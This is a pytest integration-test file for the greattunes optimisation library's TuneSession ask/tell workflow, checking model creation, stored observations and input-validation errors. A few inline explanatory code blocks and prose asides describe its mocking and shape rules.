assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None


@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_response, random_start",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True],  # case 1 with random start
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True],  # case 2 with random start
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8]], dtype=torch.double), False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[103]], dtype=torch.double), False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8]], dtype=torch.double), False]
    ]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_response_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_response, random_start,
monkeypatch):
"""
test that a single loop of ask/tell works when providing response as kwarg to tell: creates a candidate, creates a
model, stores covariates and response. Monkeypatch "_read_response_manual_input" from ._observe.py to circumvent
manual input via builtins.input and provides response via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# # monkeypatch "_read_response_manual_input"
# resp_tensor = torch.tensor([[12]], dtype=torch.double)
#
# def mock_read_response_manual_input(additional_text):
# return resp_tensor
# monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell(response_obs=kwarg_response)
### check for tell (no reason to assert for ask)###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == kwarg_response[0,0].item() #resp_tensor[0, 0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None


@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_covariates, kwarg_response, random_start",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), True],  # case 1 with random start
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), True],  # case 2 with random start
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 1.2, 107]], dtype=torch.double), torch.tensor([[103]], dtype=torch.double), False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 1.2, 107]], dtype=torch.double), torch.tensor([[0.8]], dtype=torch.double), False]
    ]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_covars_response_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_covariates,
random_start, kwarg_response):
"""
test that a single loop of ask/tell works when providing both covariates and response as kwarg to tell: creates a
candidate, creates a model, stores covariates and response.
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# run the ask method
cc.ask()
# run the tell method
cc.tell(covar_obs=kwarg_covariates, response_obs=kwarg_response)
### check for tell (no reason to assert for ask)###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == kwarg_covariates[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == kwarg_response[0,0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None


# test in single ask-tell loop for failures
@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_covariates, error_msg",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8, 2.0]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([1.], dtype=torch.float64)', but got 'tensor([[1.8000, 2.0000]], dtype=torch.float64)'"],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, [1, 'a'], "must be real number, not str"],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 2.2]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([1.5000], dtype=torch.float64)', but got 'tensor([[1.8000, 2.2000]], dtype=torch.float64)'"],
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, ['b', 12.5], "too many dimensions 'str'"],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8, 0.2, 103, 12]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([ 1.1355, -3.1246, 105.4396], dtype=torch.float64)', but got 'tensor([[ 0.8000, 0.2000, 103.0000, 12.0000]], dtype=torch.float64)'"],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([0.8, 0.2, 103], dtype=torch.double), "greattunes.utils.__get_covars_from_kwargs: dimension mismatch in provided 'covars'. Was expecting torch tensor of size (1,<num_covariates>) but received one of size (3)."],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, [1, 2, 'a'], "must be real number, not str"]
    ]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_covars_fails(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_covariates, error_msg,
monkeypatch):
"""
test that a single loop of ask/tell fails when providing covars as kwarg to tell. Monkeypatch
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input and provides
covariates via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
with pytest.raises(Exception) as e:
cc.tell(covar_obs=kwarg_covariates)
assert str(e.value) == error_msg
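# The dimension-mismatch failures asserted above all reduce to a
# (1, <num_covariates>) row-vector requirement on the covariates kwarg. A
# pure-python sketch of that shape rule ("is_row_vector" is an illustrative
# helper written for this note, not the greattunes implementation):

```python
# Sketch of the (1, <num_covariates>) shape rule behind the error messages
# above; operates on plain shape tuples so no torch dependency is needed.
def is_row_vector(shape, num_covariates):
    # accepted: exactly two dimensions, a single row, num_covariates columns
    return len(shape) == 2 and shape[0] == 1 and shape[1] == num_covariates

assert is_row_vector((1, 3), 3)      # like torch.Size([1, 3]) -> accepted
assert not is_row_vector((3,), 3)    # like torch.Size([3]) -> rejected (1-d)
assert not is_row_vector((1, 4), 3)  # wrong number of covariates -> rejected
```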


@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_response, error_msg",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8, 2.2]], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (1, 2)."],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, ['a'], "too many dimensions 'str'"],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, [12, 'a'], "must be real number, not str"],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 2.2]], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (1, 2)."],
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, ['b', 12.5], "too many dimensions 'str'"],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, [0.8, 'b'], "must be real number, not str"],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8], [103]], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (2, 1)."],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([0.8, 103], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (2)."],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, [1, 'a'], "must be real number, not str"]
    ]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_response_fails(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_response, error_msg,
monkeypatch):
"""
test that a single loop of ask/tell fails when providing the response as a kwarg to tell. Monkeypatch
"_read_covars_manual_input" from ._observe.py to circumvent manual input via builtins.input; the response is
provided via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# run the ask method
cc.ask()
# run the tell method
with pytest.raises(Exception) as e:
cc.tell(response_obs=kwarg_response)
assert str(e.value) == error_msg
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
]
)
def test_CreativeProject_integration_ask_tell_ask_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that an iteration of ask-tell-ask works (like "test_CreativeProject_tell_integration_ask_tell_one_loop_works"
above). Specifically also test that this stores an acquisition function. Monkeypatch "_read_covars_manual_input"
and "_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# run the ask method for a new data point
cc.ask()
# check acquisition function
assert cc.acq_func["object"] is not None
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
### assert for ask ###
# check that TWO entries have been added to cc.proposed_X
assert cc.proposed_X.size()[0] == 2
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated TWICE
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 2
### check for tell ###
# assert that ONE observation has been added for covariates
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that ONE observation has been added for the response
assert cc.train_Y.size()[0] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
# assert that ONE observation has been added for x_data
assert cc.x_data.shape[0] == 1
for i in range(cc.x_data.shape[1]):
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[0] == candidate_tensor[0, i].item()
# assert that ONE observation has been added to y_data
assert cc.y_data.shape[0] == 1
assert cc.y_data["Response"].iloc[0] == resp_tensor[0, 0].item()
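The mocks above take only `additional_text` and no `self`; that works because `monkeypatch.setattr(cc, ...)` shadows the bound method with a plain function stored on the instance. A minimal standalone sketch of that mechanism (class and values hypothetical, not the greattunes API):

```python
class Session:
    def _read_response_manual_input(self, additional_text):
        raise RuntimeError("would block on builtins.input")

    def tell(self):
        return self._read_response_manual_input("enter response: ")

cc = Session()
# Equivalent of monkeypatch.setattr(cc, "_read_response_manual_input", mock):
# an instance attribute is a plain function, not a descriptor, so it receives
# only the one positional argument and no implicit self.
cc._read_response_manual_input = lambda additional_text: 12.0
print(cc.tell())  # 12.0
```

pytest's `monkeypatch` additionally restores the original attribute after the test, which a bare assignment like this does not.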
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1]
]
)
def test_CreativeProject_integration_ask_ask_tell_overwrite_candidate_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that the first proposed new candidate datapoint is ignored if ask is run twice (without any tell). Test that
everything works downstream: creates a candidate, creates a model, stores covariates and response.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality). That is, set attributes set
# both by _Initializers__initialize_training_data and by _Initializers__initialize_random_start
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the ask method AGAIN
cc.ask()
# run the tell method
cc.tell()
### assert for ask ###
# check that an entry has been added to cc.proposed_X
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated ONLY ONCE
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 1
### check for tell ###
# assert that ONE new observation has been added for covariates
assert cc.train_X.size()[0] == train_X.size()[0] + 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that ONE new observation has been added for the response
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
# test with repeat "tell" that train_X, train_Y last row is only added once
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1]
]
)
def test_CreativeProject_integration_ask_tell_tell_overwrite_covar_resp_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that the first reported datapoint for covars and response (last entries in train_X, train_Y) is overwritten if
tell is run twice (without two iterations of ask). Only the last datapoint entry should remain. Test that
everything works downstream: creates a candidate, creates a model, stores covariates and response.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# ISSUE IS THAT I AM CIRCUMVENTING THE INITIALIZATION OF RANDOM POINTS WHICH REQUIRES THAT TRAIN_X, TRAIN_Y
# INITIALIZATION HAS FINISHED. I NEED TO SET RANDOM INITIALIZATION PARAMETERS MANUALLY BELOW
#
# ALSO MAKE SURE I DO AT LEAST ONE TEST WHERE I DO THE FULL E2E TEST (ALLOWING FOR AUTOMATICALLY CREATING RANDOM
# INITIALIZATION)
# set attributes on class (to simulate previous iterations of ask/tell functionality). That is, set attributes set
# both by _Initializers__initialize_training_data and by _Initializers__initialize_random_start
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.x_data = tensor2pretty_covariate(train_X_sample=train_X, covar_details=cc.covar_details)
cc.y_data = tensor2pretty_response(train_Y_sample=train_Y)
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# define decorator to add 1.0 to all entries in monkeypatched returned data. This to be able to tell that the last
# entry (from second "tell") is different than the first, and know that it has been overwritten
def add_one(func):
@functools.wraps(func)
def wrapper_add_one(*args, **kwargs):
wrapper_add_one.num_calls += 1
output = func(*args, **kwargs)
return output + wrapper_add_one.num_calls
wrapper_add_one.num_calls = 0
return wrapper_add_one
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
@add_one
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
@add_one
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# run the tell method AGAIN
cc.tell()
### assert for ask ###
# check that an entry has been added to cc.proposed_X
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 1
### check for tell ###
# assert that ONLY ONE new observation has been added for covariates
assert cc.train_X.size()[0] == train_X.size()[0] + 1
assert cc.x_data.shape[0] == cc.train_X.size()[0]
# assert that the right elements have been added to the covariate observation (should be candidate_tensor with
# "add_one" applied twice, i.e. adding 2.0 to each entry)
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item() + 2.0
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[-1] == candidate_tensor[0, i].item() + 2.0
# assert that ONLY ONE new observation has been added for the response
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
assert cc.y_data.shape[0] == train_Y.size()[0] + 1
# assert that the right elements have been added to the response observation (should be resp_tensor with "add_one"
# applied twice, i.e. adding 2.0 to each entry)
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item() + 2.0
assert cc.y_data["Response"].iloc[-1] == resp_tensor[0, 0].item() + 2.0
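The `add_one` decorator defined inside the test above is a plain call-counting closure: state lives on a function attribute, and each call offsets the wrapped output by the running count. A standalone sketch (plain floats instead of tensors; `reading` is a hypothetical function):

```python
import functools

def add_one(func):
    @functools.wraps(func)
    def wrapper_add_one(*args, **kwargs):
        # Bump the counter first, then offset the wrapped output by it.
        wrapper_add_one.num_calls += 1
        return func(*args, **kwargs) + wrapper_add_one.num_calls
    wrapper_add_one.num_calls = 0
    return wrapper_add_one

@add_one
def reading():
    return 10.0

print(reading())  # 11.0 on the first call
print(reading())  # 12.0 on the second call
```

This is why the test asserts an offset of `+ 2.0` after two `tell` calls: the mocked input function has been invoked twice by then.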
# test that model is updated (overwritten)
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
]
)
def test_CreativeProject_integration_ask_tell_ask_tell_model_acq_func_update_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that both surrogate model and acquisition functions are added and updated following two rounds of ask-tell.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input. This automatically tests the new functionality of random start by starting from no data
(train_X, train_Y)
"""
# initialize the class
# random_start = True is default, so this tests random start
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# define decorator to add 1.0 to all entries in monkeypatched returned data. This to be able to tell that the last
# entry (from second "tell") is different than the first, and know that it has been overwritten
def add_one(func):
@functools.wraps(func)
def wrapper_add_one(*args, **kwargs):
wrapper_add_one.num_calls += 1
output = func(*args, **kwargs)
return output + wrapper_add_one.num_calls
wrapper_add_one.num_calls = 0
return wrapper_add_one
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
@add_one
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
@add_one
def mock_read_response_manual_input(additional_text):
return resp_tensor
